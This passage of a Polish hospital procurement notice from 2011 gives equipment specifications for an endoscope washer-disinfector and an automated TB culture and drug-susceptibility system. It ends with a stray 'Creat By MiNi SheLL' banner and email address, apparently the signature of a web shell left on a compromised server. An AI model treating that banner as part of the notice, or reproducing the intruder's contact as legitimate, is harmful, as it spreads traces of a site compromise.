- przedlicencyjne warsztaty EEG pod patronatem PTNK dla lekarza neurologa (min. 1 blok warsztatowy)
35	transport krajowy i zagraniczny wraz z ubezpieczeniem, wszelkie opłaty celne, skarbowe oraz inne opłaty pośrednie po stronie dostawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.11.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Myjnia do endoskopów dla potrzeb Poradni Gastroenterologicznej 
z Pracownią Endoskopową im. Dr Janusza Zawadzkiego - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Myjnia do endoskopów dla potrzeb Poradni Gastroenterologicznej 
z Pracownią Endoskopową im. Dr Janusza Zawadzkiego - 1 szt.

Lp.	Opis parametru
1	Urządzenie fabrycznie nowe, rok produkcji nie wcześniej niż 2011 r.
2	Możliwość mycia i dezynfekcji 2 endoskopów jednocześnie.
3	Asynchroniczne mycie i dezynfekcja  endoskopów 
(dwie niezależne, oddzielnie sterowane komory robocze)
4	Urządzenie stacjonarne o gabarytach maksymalnych : 
wysokość  120 cm, szerokość  91 cm, głębokość  66 cm.
5	Dezynfekcja chemiczna
6	Urządzenie wyposażone w podgrzewacz dezyfektanta i sensor temperaturowy każdej z komór.
7.	Proces dezynfekcyjny z ograniczonym do minimum ryzykiem szkodliwego wpływu na zdrowie personelu i środowiska.
8.	Skład płynów dezynfekcyjnych przyjazny w dezynfekcji endoskopów giętkich f-my Olympus, którymi dysponuje placówka.
9.	Temperatura dezynfekcji min. 20°C
10.	Praca myjni w obiegu zamkniętym (mycie, dezynfekcja, płukanie, suszenie)
11	Mycie i dezynfekcja endoskopów elastycznych różnych producentów w tym f-my Olympus którymi dysponuje placówka.
12	Automatyczna kontrola szczelności endoskopu przez cały proces
13	System kontroli przepływu płynów przez kanały endoskopu.
14	Jednakowe warunki mycia powierzchni wewnętrznych 
i zewnętrznych endoskopu
15	Samodezynfekcja myjni
16	Opcja płukania kanałów alkoholem 
17	Sterowanie mikroprocesorowe
18	Minimum 7 programów mycia i dezynfekcji
19	Minimum dwuliniowy wyświetlacz komunikatów tekstowych
20	Wyświetlanie komunikatów w języku polskim
21	Wybór programów dostosowany do rodzaju i stopnia zanieczyszczenia endoskopów
22	Możliwość modyfikacji programów
23	Wbudowana drukarka parametrów procesu z możliwością wydruku raportu z przebiegu każdego cyklu dezynfekcji
24	Myjnia wyposażona w kompaktowy zmiękczacz wody zapewniający prawidłowe parametry wody dla pracy myjni.
25	Zasilanie elektryczne myjni 230V; 50Hz
INNE
26	Oferowane urządzenie jest dopuszczone do stosowania i użytkowania w Polsce zgodnie z ustawą o wyrobach medycznych z 20 maja 2010 roku
27	Okres gwarancji na urządzenie min. 24 miesiące. W okresie gwarancji Zamawiający nie ponosi żadnych kosztów związanych z obsługą serwisową urządzenia.
28	Instruktaż personelu Zamawiającego w zakresie obsługi urządzenia przeprowadzony w dwóch uzgodnionych terminach.
29	Autoryzowany serwis gwarancyjny i pogwarancyjny na terenie Polski
30	Czas reakcji serwisu na zgłoszenie awarii w okresie gwarancji do 48 godzin.

31	Deklaracja zgodności  z normą PN_EN ISO 15883-4 
32	Urządzenie oznakowane znakiem CE   
33	Instrukcja obsługi urządzenia w języku polskim w wersji papierowej i elektronicznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Automatyczny system do izolacji i określenia lekowrażliwości prątków gruźlicy dla potrzeb Laboratorium Mikrobiologicznego - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Automatyczny system do izolacji i określenia lekowrażliwości prątków gruźlicy dla potrzeb Laboratorium Mikrobiologicznego - 1 szt.
Lp.	Opis parametru
1	Pełna automatyzacja procesu kontroli wzrostu TB
2	Ilość miejsc pomiarowych nie więcej niż 320
3.	Analiza procesu wzrostu TB oparta na metodzie fluorescencji
4.	Oznaczenie lekowrażliwości na streptomycynę, izoniazyd, rifampicynę, etambutol i pyrazynamid
5.	W analizie lekorważliwości możliwość łączenia w pakiety probówek z analizowanymi preparatami (lakami) dla poszczególnych pacjentów
6.	Komunikacja z użytkownikiem realizowana za pomocą ciekłokrystalicznego ekranu
7.	Możliwość zapamiętania wyników analiz
8.	Wizualne i dźwiękowe alarmy przekroczenia ustalonych/ prawidłowych parametrów procesu
9.	Zintegrowany czytnik kodów paskowych, oprogramowanie umożliwiające identyfikację próbek na podstawie kodu
10.	Aparat wyposażony w drukarkę umożliwiającą wydruk raportu badania
11.	Zapewnienie serwisu i przeglądów technicznych aparatu w okresie gwarancji z zgodnie z zaleceniami producenta.
12.	Instrukcja obsługi w języku polskim
13.	Deklaracja CE

Zamawiający wymaga  dostawy odczynników niezbędnych do uruchomienia w/w systemu . Odczynniki te muszą być kompatybilne z określonym systemem przez Zamawiającego.
Lp.	Produkt	Ilość
1	Probówki z podłożem płynnym do hodowli, wykonane z tworzywa, zakręcane ( probówki do hodowli i oznaczania lekorważliwości )	100 szt.
2	Zestaw z suplementem antybiotykowym i wzrostowym PANTA OADC	100 oznaczeń
3	Zestaw do oznaczania wrażliwości na: streptomycynę, izoniazyd, rifampicynę, etambutol SIRE	50 oznaczeń
4.	Zetaw do oznaczenia wrażliwości na pirazynamid PZA	50 oznaczeń
5.	Probówki z podłożem do oznaczania wrażliwości na pirazynamid	25 oznaczeń
6.	Test niacynowy do identyfikacji prątka	25 paski(szt.)
7.	Kontrola testu niacynowego	50 krążków (szt.)
8.	Test do identyfikacji mycobacterium z hodowli na podłożu płynnym	25 testów (szt.)
9.	Zestaw do opracowania probówki materiału w kierunku prątka 	10 ml
10.	Probówki do pobierania i obróbki materiału w kierunku prątka , poj. 50 ml, stożkowe dno (Falcon)	500 probówek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com